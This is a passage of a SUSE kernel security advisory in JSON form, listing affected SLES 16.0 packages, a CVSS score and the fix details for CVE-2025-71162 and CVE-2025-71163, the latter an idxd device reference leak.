"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71162"
},
{
"cve": "CVE-2025-71163",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71163"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: fix device leaks on compat bind and unbind\n\nMake sure to drop the reference taken when looking up the idxd device as\npart of the compat bind and unbind sysfs interface.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71163",
"url": "https://www.suse.com/security/cve/CVE-2025-71163"
},
{
"category": "external",
"summary": "SUSE Bug 1257215 for CVE-2025-71163",
"url": "https://bugzilla.suse.com/1257215"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
